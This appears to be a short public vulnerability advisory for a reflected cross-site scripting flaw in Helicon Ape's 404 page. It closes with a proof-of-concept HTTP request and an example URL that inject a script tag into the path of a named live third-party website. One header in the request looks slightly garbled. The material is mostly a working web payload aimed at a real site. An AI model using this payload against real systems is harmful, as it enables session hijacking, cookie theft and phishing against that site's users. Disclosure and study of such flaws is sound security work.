# Title: Helicon Ape Reflective Cross Site Scripting 404 Page # Date: 2020-03-28 # Author: Sir.Liosion # Vendor Homepage: http://www.helicontech.com # Vendor Download Page: http://www.helicontech.com/ape/download.html # Tested on: Windows 10 # Versions: Build 0256 and before # Vulnerable Parameter: 404 Get URL # Notes: # An attacker can use XSS (404 Not Found Page)to send a malicious script to an unsuspecting Admins or users. The # end admins or useras browser has no way to know that the script should not # be trusted, and will execute the script. Because it thinks the script came # from a trusted source, the malicious script can access any cookies, session # tokens, or other sensitive information retained by the browser and used # with that site. These scripts can even rewrite the content of the HTML # page. Even an attacker can easily place users in social engineering through # this vulnerability and create a fake field. # PoC: GET /contact-lens/"><script>alert("XSS")</script> HTTP/1.1 Host: www.khanoumi.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflateb78be271c528 Connection: close Upgrade-Insecure-Requests: 1 Example Vulnerable URL: https://www.khanoumi.com/contact-lens/"><script>alert("XSS")</script>